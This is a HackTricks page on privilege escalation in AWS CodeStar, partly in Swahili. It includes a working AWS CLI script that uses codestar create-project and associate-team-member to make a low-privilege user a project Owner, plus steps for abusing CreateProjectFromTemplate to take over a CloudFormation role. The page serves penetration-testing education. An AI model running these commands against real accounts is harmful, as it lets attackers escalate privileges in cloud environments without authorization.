AWS - Codestar Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Codestar

You can find more information about codestar in:

codestar:CreateProject, codestar:AssociateTeamMember

`iam:PassRole`, `codestar:CreateProject`

With these permissions you can abuse a codestar IAM Role to perform arbitrary actions through a cloudformation template. Check the following page:

iam:PassRole, codestar:CreateProject

`codestar:CreateProject`, `codestar:AssociateTeamMember`

Hii mbinu inatumia codestar:CreateProject kuunda mradi wa codestar, na codestar:AssociateTeamMember kufanya mtumiaji wa IAM kuwa mmiliki wa mradi mpya wa CodeStar, ambayo itawapa sera mpya yenye ruhusa chache za ziada.

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed

Ikiwa wewe ni mwanachama wa mradi tayari unaweza kutumia ruhusa codestar:UpdateTeamMember kuboresha nafasi yako kuwa mmiliki badala ya codestar:AssociateTeamMember.

Athari Zinazoweza Kutokea: Privesc kwa sera ya codestar iliyoundwa. Unaweza kupata mfano wa sera hiyo katika:

codestar:CreateProject, codestar:AssociateTeamMember

`codestar:CreateProjectFromTemplate`

Unda Mradi Mpya:

Tumia hatua codestar:CreateProjectFromTemplate kuanzisha uundaji wa mradi mpya.
Baada ya uundaji kufanikiwa, ruhusa inatolewa moja kwa moja kwa cloudformation:UpdateStack.
Ruhusa hii inahusisha stack inayohusiana na nafasi ya CodeStarWorker-<jina la mradi wa kawaida>-CloudFormation.

Sasisha Stack Lengo:

Kwa ruhusa za CloudFormation zilizotolewa,endelea kusasisha stack iliyoainishwa.
Jina la stack kawaida litafuata moja ya mifumo miwili:
awscodestar-<jina la mradi wa kawaida>-infrastructure
awscodestar-<jina la mradi wa kawaida>-lambda
Jina halisi linategemea template iliyochaguliwa (inarejelea mfano wa script ya unyakuzi).

Upatikanaji na Ruhusa:

Baada ya sasisho, unapata uwezo uliopewa CloudFormation IAM role iliyounganishwa na stack.
Kumbuka: Hii haipatii moja kwa moja ruhusa kamili za msimamizi. Rasilimali zingine zisizo sahihi ndani ya mazingira zinaweza kuhitajika ili kuongeza ruhusa zaidi.

Kwa maelezo zaidi angalia utafiti wa asili: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. Unaweza kupata unyakuzi katika https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py

Athari Zinazoweza Kutokea: Privesc kwa nafasi ya cloudformation IAM.

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki hila za unyakuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - Codepipeline Privesc Nextcodestar:CreateProject, codestar:AssociateTeamMember

Last updated 3 days ago